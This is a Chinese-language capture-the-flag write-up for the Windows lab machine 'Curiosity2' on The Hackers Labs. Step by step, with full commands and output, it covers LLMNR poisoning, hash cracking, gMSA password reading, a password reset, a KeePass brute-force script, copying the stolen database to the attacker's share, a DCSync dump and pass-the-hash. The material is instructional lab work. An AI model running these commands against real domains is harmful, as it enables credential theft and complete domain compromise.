TheHackersLabs Curiosity2 Walkthrough

靶场:The Hackers Labs
地址:https://thehackerslabs.com/curiosity2/
系统:windows
内容:bloodhound基本使用、impacket使用、DCSync权限利用

机器的作者和curiosity1都是同一人,前期过程基本相同,可以两篇结合起来察看。

从端口扫描开始。

─$ nmap -sV -sC -Pn -p-  -oN port.log $IP
PORT      STATE SERVICE       VERSION                                                                                                                                     
53/tcp    open  domain        Simple DNS Plus                                                                                                                             
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-11 02:32:09Z)                                                                              
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                                                       
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                               
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)                                                   
|_ssl-date: 2024-11-11T02:33:11+00:00; +5s from scanner time.                                                                                                             
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl                                                                                                                  
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl                                                                  
| Not valid before: 2024-10-11T16:05:23                                                                                                                                   
|_Not valid after:  2025-10-11T16:05:23                                                                                                                                   
445/tcp   open  microsoft-ds?                                                                                                                                             
464/tcp   open  kpasswd5?                                                                                                                                                 
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                                                                                         
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)                                                   
|_ssl-date: 2024-11-11T02:33:11+00:00; +5s from scanner time.                                                                                                             
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl                                                                                                                  
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl                                                                  
| Not valid before: 2024-10-11T16:05:23                                                                                                                                   
|_Not valid after:  2025-10-11T16:05:23                                                                                                                                   
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)                                                   
|_ssl-date: 2024-11-11T02:33:11+00:00; +5s from scanner time.                                                                                                             
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl                                                                                                                  
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl                                                                  
| Not valid before: 2024-10-11T16:05:23                                                                                                                                   
|_Not valid after:  2025-10-11T16:05:23                                                                                                                                   
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)                                                   
|_ssl-date: 2024-11-11T02:33:11+00:00; +5s from scanner time.                                                                                                             
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl                                                                                                                  
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl                                                                  
| Not valid before: 2024-10-11T16:05:23                                                                                                                                   
|_Not valid after:  2025-10-11T16:05:23                                                                                                                                   
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                                     
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                               
|_http-title: Not Found                                                                                                                                                   
9389/tcp  open  mc-nmf        .NET Message Framing                                                                                                                        
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                                     
|_http-title: Not Found                                                                                                                                                   
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                               
49664/tcp open  msrpc         Microsoft Windows RPC                                                                                                                       
49665/tcp open  msrpc         Microsoft Windows RPC                                                                                                                       
49666/tcp open  msrpc         Microsoft Windows RPC                                                                                                                       
49668/tcp open  msrpc         Microsoft Windows RPC                                                                                                                       
49670/tcp open  msrpc         Microsoft Windows RPC                                                                                                                       
49672/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                                                                                         
49675/tcp open  msrpc         Microsoft Windows RPC                                                                                                                       
49691/tcp open  msrpc         Microsoft Windows RPC                    
57033/tcp open  msrpc         Microsoft Windows RPC
57041/tcp open  msrpc         Microsoft Windows RPC
57936/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-11-11T02:33:11+00:00; +5s from scanner time.
| ms-sql-info: 
|   192.168.56.116\SQLEXPRESS: 
|     Instance name: SQLEXPRESS
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019 
|       Service pack level: RTM
|       Post-SP patches applied: false
|     TCP port: 57936
|_    Clustered: false
| ms-sql-ntlm-info: 
|   192.168.56.116\SQLEXPRESS: 
|     Target_Name: CONS
|     NetBIOS_Domain_Name: CONS
|     NetBIOS_Computer_Name: WIN-C73PROQLRHL
|     DNS_Domain_Name: cons.thl
|     DNS_Computer_Name: WIN-C73PROQLRHL.cons.thl
|_    Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after:  2025-10-11T16:05:23
MAC Address: 08:00:27:71:33:FC (Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-C73PROQLRHL; OS: Windows; CPE: cpe:/o:microsoft:windows

使用wireshark可以监听到靶机发出的请示。

使用responder进行响应,获得两个用户的hash。

[*] [NBT-NS] Poisoned answer sent to 192.168.56.116 for name SQLSERVER (service: File Server)
[*] [LLMNR]  Poisoned answer sent to fe80::e5a2:c49f:830f:78f1 for name SQLserver
[*] [LLMNR]  Poisoned answer sent to 192.168.56.116 for name SQLserver
[*] [LLMNR]  Poisoned answer sent to fe80::e5a2:c49f:830f:78f1 for name SQLserver
[*] [LLMNR]  Poisoned answer sent to 192.168.56.116 for name SQLserver
[SMB] NTLMv2-SSP Client   : fe80::e5a2:c49f:830f:78f1
[SMB] NTLMv2-SSP Username : cons\Appolonia
[SMB] NTLMv2-SSP Hash     : Appolonia::cons:8479a168c320e580:96725E5F1EB82D3FF6BB645504E2191A:0101000000000000805C9D9A2534DB01330BD06C60AE024000000000020008005400470048004D0001001E00570049004E002D0038004A0032003700570037005900350050005000540004003400570049004E002D0038004A003200370057003700590035005000500054002E005400470048004D002E004C004F00430041004C00030014005400470048004D002E004C004F00430041004C00050014005400470048004D002E004C004F00430041004C0007000800805C9D9A2534DB010600040002000000080030003000000000000000000000000040000063266950626D7879985B198FDDF7A864E5A65CF85FF00675E981D342CCEE178B0A0010000000000000000000000000000000000009001C0063006900660073002F00530051004C00730065007200760065007200000000000000000000000000
[*] [NBT-NS] Poisoned answer sent to 192.168.56.116 for name SQLDATABABASE (service: File Server)
[*] [LLMNR]  Poisoned answer sent to fe80::e5a2:c49f:830f:78f1 for name SQLDatababase
[*] [LLMNR]  Poisoned answer sent to 192.168.56.116 for name SQLDatababase
[*] [LLMNR]  Poisoned answer sent to fe80::e5a2:c49f:830f:78f1 for name SQLDatababase
[*] [LLMNR]  Poisoned answer sent to 192.168.56.116 for name SQLDatababase
[SMB] NTLMv2-SSP Client   : fe80::e5a2:c49f:830f:78f1
[SMB] NTLMv2-SSP Username : cons\sqldb
[SMB] NTLMv2-SSP Hash     : sqldb::cons:a1f2d5ff663bb0c3:46CF04475A4C36D635B9A10CC5DA77BE:0101000000000000805C9D9A2534DB01D7BE830346C4B55700000000020008005400470048004D0001001E00570049004E002D0038004A0032003700570037005900350050005000540004003400570049004E002D0038004A003200370057003700590035005000500054002E005400470048004D002E004C004F00430041004C00030014005400470048004D002E004C004F00430041004C00050014005400470048004D002E004C004F00430041004C0007000800805C9D9A2534DB010600040002000000080030003000000000000000000000000040000063266950626D7879985B198FDDF7A864E5A65CF85FF00675E981D342CCEE178B0A001000000000000000000000000000000000000900240063006900660073002F00530051004C004400610074006100620061006200610073006500000000000000000000000000

由于作者在curiosity1里就使用的seasons.txt作为密码字典,这里同样使用该字典,爆出两个用户的密码。

└─$ john --wordlist=/usr/share/seclists/Passwords/seasons.txt sqldb.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
au7umn@          (sqldb)     
1g 0:00:00:00 DONE (2024-11-11 10:39) 25.00g/s 51200p/s 51200c/s 51200C/s 5umm3r123&..f4ll2021@
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

┌──(kali㉿mykali)-[~/Documents/curiosity2]
└─$ john --wordlist=/usr/share/seclists/Passwords/seasons.txt appolonia.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
5umm3r@          (Appolonia)     
1g 0:00:00:00 DONE (2024-11-11 10:39) 25.00g/s 25600p/s 25600c/s 25600C/s $pr1ng..5umm3r123%
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

查看一下smb,没有特别的目录。

└─$ crackmapexec smb $IP -u 'appolonia' -p '5umm3r@' --shares
SMB         192.168.56.116  445    WIN-C73PROQLRHL  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-C73PROQLRHL) (domain:cons.thl) (signing:True) (SMBv1:False)
SMB         192.168.56.116  445    WIN-C73PROQLRHL  [+] cons.thl\appolonia:5umm3r@ 
SMB         192.168.56.116  445    WIN-C73PROQLRHL  [+] Enumerated shares
SMB         192.168.56.116  445    WIN-C73PROQLRHL  Share           Permissions     Remark
SMB         192.168.56.116  445    WIN-C73PROQLRHL  -----           -----------     ------
SMB         192.168.56.116  445    WIN-C73PROQLRHL  ADMIN$                          Remote Admin
SMB         192.168.56.116  445    WIN-C73PROQLRHL  C$                              Default share
SMB         192.168.56.116  445    WIN-C73PROQLRHL  IPC$            READ            Remote IPC
SMB         192.168.56.116  445    WIN-C73PROQLRHL  NETLOGON        READ            Logon server share 
SMB         192.168.56.116  445    WIN-C73PROQLRHL  SYSVOL          READ            Logon server share 
SMB         192.168.56.116  445    WIN-C73PROQLRHL  Users           READ            

查看一下winrm权限,可以登录。

└─$ crackmapexec winrm $IP -u 'appolonia' -p '5umm3r@'     
SMB         192.168.56.116  5985   WIN-C73PROQLRHL  [*] Windows 10 / Server 2016 Build 14393 (name:WIN-C73PROQLRHL) (domain:cons.thl)
HTTP        192.168.56.116  5985   WIN-C73PROQLRHL  [*] http://192.168.56.116:5985/wsman
WINRM       192.168.56.116  5985   WIN-C73PROQLRHL  [+] cons.thl\appolonia:5umm3r@ (Pwn3d!)

利用netexec远程下载bloodhound信息(可以登录终端上传BloodHound.exe进行)。

└─$ netexec ldap $IP -u 'appolonia' -p '5umm3r@'  --bloodhound --collection All --dns-server $IP
SMB         192.168.56.116  445    WIN-C73PROQLRHL  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-C73PROQLRHL) (domain:cons.thl) (signing:True) (SMBv1:False)
LDAP        192.168.56.116  389    WIN-C73PROQLRHL  [+] cons.thl\appolonia:5umm3r@ 
LDAP        192.168.56.116  389    WIN-C73PROQLRHL  Resolved collection methods: container, session, localadmin, objectprops, acl, trusts, rdp, dcom, group, psremote
LDAP        192.168.56.116  389    WIN-C73PROQLRHL  Done in 00M 02S
LDAP        192.168.56.116  389    WIN-C73PROQLRHL  Compressing output into /home/kali/.nxc/logs/WIN-C73PROQLRHL_192.168.56.116_2024-11-11_110050_bloodhound.zip

appolonia登录后可以拿到user flag,但没有进一步提权的途径。换刚才爆出密码的sqldb登录,对数据库信息进行查询,在Credentials表中可以得到sqlsvc用户的hash。

─$ evil-winrm -i $IP -u sqldb -p 'au7umn@'
*Evil-WinRM* PS C:\Users\sqldb\Documents> sqlcmd -S localhost\SQLEXPRESS -E -Q "SELECT name FROM sys.databases"
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
CredentialsDB
toolsdb

(6 rows affected)
*Evil-WinRM* PS C:\Users\sqldb\Documents> sqlcmd -S localhost\SQLEXPRESS -E -Q "USE toolsdb; SELECT name FROM sys.tables;"
Changed database context to 'CredentialsDB'.
name
--------------------------------------------------------------------------------------------------------------------------------
Credentials

(1 rows affected)
*Evil-WinRM* PS C:\Users\sqldb\Documents> sqlcmd -S localhost\SQLEXPRESS -E -Q "USE CredentialsDB; SELECT * FROM Credentials;"
Changed database context to 'CredentialsDB'.
ID          Username                                           Password
----------- -------------------------------------------------- ----------------------------------------------------------------------------------------------------
          1 sqlsvc                                             a6d888301de7aa3b380a691d32837627

此外,还有一个toolsdb数据库,使用sqldb用户无法查询,此是后话。

*Evil-WinRM* PS C:\Users\sqldb\Documents> sqlcmd -S localhost\SQLEXPRESS -E -Q "USE toolsdb; SELECT name FROM sys.tables;"
Msg 916, Level 14, State 2, Server WIN-C73PROQLRHL\SQLEXPRESS, Line 1
The server principal "CONS\sqldb" is not able to access the database "toolsdb" under the current security context.

同样的字典,爆出sqlsvc的密码。

└─$ john --wordlist=/usr/share/seclists/Passwords/seasons.txt --format=Raw-MD5 sqlsvc.hash        
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
$PRING2021#      (?)     
1g 0:00:00:00 DONE (2024-11-11 12:04) 25.00g/s 9600p/s 9600c/s 9600C/s $PRING123%..$umm3r2021%
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 

由于sqlsvc是svc_account组成员,而该组对gmsa_sql用户具有ReadGMSAPassword权限。

使用工具获取gmsa_sql用户的hash。

└─$ gMSADumper.py -u sqlsvc -p '$PRING2021#'  -l $IP -d cons.thl
Users or groups who can read password for GMSA_SQL$:
 > Svc_Accounts
GMSA_SQL$:::941f79393c2e34662b678e3e5b055664
GMSA_SQL$:aes256-cts-hmac-sha1-96:abbb177d8779305e484e2df4d12cbd3b9ed1450b92bfaaa2e7b78c173577ca6d
GMSA_SQL$:aes128-cts-hmac-sha1-96:ea0572633c0e4866670f1d0c5ca928d4

可惜gmsa_sql的密码破解不出来,但是在Remote Management Users组里,可以直接以hash登录。

└─$ evil-winrm -i $IP -u gmsa_sql$ -H $(cat gmsa_sql.hash)

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\GMSA_SQL$\Documents> 

查看gmsa_xql用户的权限,对toolsdb用户具有GenericWrite和ForceChangePassword权限。

将toolsdb密码进行修改。

└─$ net rpc password toolsdb 'Pass1234!' -U cons.thl/gmsa_sql$%941f79393c2e34662b678e3e5b055664 --pw-nt-hash -S cons.thl

└─$ netexec smb $IP -u 'toolsdb' -p 'Pass1234!'                                                                
SMB         192.168.56.116  445    WIN-C73PROQLRHL  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-C73PROQLRHL) (domain:cons.thl) (signing:True) (SMBv1:False)
SMB         192.168.56.116  445    WIN-C73PROQLRHL  [+] cons.thl\toolsdb:Pass1234! 

└─$ netexec winrm $IP -u 'toolsdb' -p 'Pass1234!' 
WINRM       192.168.56.116  5985   WIN-C73PROQLRHL  [*] Windows 10 / Server 2016 Build 14393 (name:WIN-C73PROQLRHL) (domain:cons.thl)
WINRM       192.168.56.116  5985   WIN-C73PROQLRHL  [+] cons.thl\toolsdb:Pass1234! (Pwn3d!)

sqlsvc登录shell后,可以发现一个keepass数据库。

*Evil-WinRM* PS C:\Users\sqlsvc\Documents> dir

    Directory: C:\Users\sqlsvc\Documents
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/31/2024   6:23 PM           2231 Database.kdbx
*Evil-WinRM* PS C:\Users\sqlsvc\Documents> cp Database.kdbx \\192.168.56.101\kali\

但目前这个数据库还破解不了,且keepass2john不支持这个版本进行hash。先放一放,先登录toolsdb。

└─$ evil-winrm -i $IP -u toolsdb -p 'Pass1234!'

想起刚才数据库里有个tooldb库,尝试使用同名用户进行查询,果然得到一组密码。

*Evil-WinRM* PS C:\Users\toolsdb\Documents> sqlcmd -S localhost\SQLEXPRESS -E -Q "USE toolsdb; SELECT name FROM sys.tables;"
Changed database context to 'toolsdb'.
name
--------------------------------------------------------------------------------------------------------------------------------
users
*Evil-WinRM* PS C:\Users\toolsdb\Documents> sqlcmd -S localhost\SQLEXPRESS -E -Q "USE toolsdb; SELECT * FROM users;"
Changed database context to 'toolsdb'.
id          username                                           password
----------- -------------------------------------------------- --------------------------------------------------
          1 user_6B482050                                      433129A1!@1
          2 user_47F7501A                                      64409A1C!@1
          3 user_515A0C58                                      CAD616E3!@1
          4 user_CA843BF2                                      731C60AD!@1
          5 user_AA2B9FF8                                      8E181E5F!@1
          6 user_F6E6A108                                      47862562!@1
          7 user_8D56BAE8                                      425B6335!@1
          8 user_BA9B1295                                      E4FC1AC4!@1
          9 user_66B7DBEE                                      4EE216A3!@1
         10 user_E75B7C23                                      4CD89A92!@1

(10 rows affected)

密码数据不多,可以逐个尝试,这里使用GTP生成的脚本。

#!/bin/bash

# KeePass数据库文件
DATABASE="Database.kdbx"
# 密码字典文件
PASSWORD_FILE="dbpass.txt"

# 循环读取密码字典文件
while IFS= read -r password
do
    echo "$password"
    # 使用 keepassxc-cli 尝试打开数据库并捕获输出
    output=$(echo "$password" | keepassxc-cli ls "$DATABASE" 2>&1)

    # 检查输出中是否包含 "Error" 关键词
    if [[ "$output" != *"Error"* ]]; then
        echo "正确的密码是: $password"
        exit 0
    fi
done < "$PASSWORD_FILE"

# 如果循环结束还没有找到密码
echo "没有找到正确的密码,请检查密码字典文件。"
exit 1

运行脚本 ,很快得到正确密码。

└─$ ./crack.sh 
433129A1!@1
64409A1C!@1
CAD616E3!@1
731C60AD!@1
8E181E5F!@1
正确的密码是: 8E181E5F!@1

在keepass中查看,可以得到MSOL用户及其密码。

检测一下,该密码是正确的。可惜也不能远程登录。

└─$ netexec smb $IP -u 'msol' -p 'YRax2Ry8g2ITQ3hpRPze' 
SMB         192.168.56.116  445    WIN-C73PROQLRHL  [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-C73PROQLRHL) (domain:cons.thl) (signing:True) (SMBv1:False)
SMB         192.168.56.116  445    WIN-C73PROQLRHL  [+] cons.thl\msol:YRax2Ry8g2ITQ3hpRPze

在bloodhound中仔细查看msol用户的权限,发现具有DCSync权限。

尝试dump AD数据库的密码hash。

─$ impacket-secretsdump cons.thl/msol:YRax2Ry8g2ITQ3hpRPze@cons.thl                                                                                                      
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies                                                                                                     

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied                                                                                        
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                                             
[*] Using the DRSUAPI method to get NTDS.DIT secrets                                                                                                                      
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5d48bcf84aea999fb1ade06970a81237:::                                                                                    
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                            
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a6c4014f622dcadd4ec24cec540aaa86:::
...
[*] Kerberos keys grabbed                                                                                                                                                 
Administrator:aes256-cts-hmac-sha1-96:664eace29b9c52eaae7db24b5caf22d8bb49cc0e45dc0be785240e3a72b58ce5                                                                    
Administrator:aes128-cts-hmac-sha1-96:10d1219ee7df9a9fe1ca2ba8f2cb06d1                                                                                                    
Administrator:des-cbc-md5:abce3dc14c807ce9 
...
WIN-C73PROQLRHL$:aes128-cts-hmac-sha1-96:7114638dd67abf41820b61a2770e58b8
WIN-C73PROQLRHL$:des-cbc-md5:e5dffefeeab9f21c
GMSA_SQL$:aes256-cts-hmac-sha1-96:abbb177d8779305e484e2df4d12cbd3b9ed1450b92bfaaa2e7b78c173577ca6d
GMSA_SQL$:aes128-cts-hmac-sha1-96:ea0572633c0e4866670f1d0c5ca928d4
GMSA_SQL$:des-cbc-md5:e50837e0457ad931
[*] Cleaning up...

使用dump下的Administrator密码hash,成功拿到root。

└─$ evil-winrm -i $IP -u administrator -H 5d48bcf84aea999fb1ade06970a81237

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cons\administrator
1

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注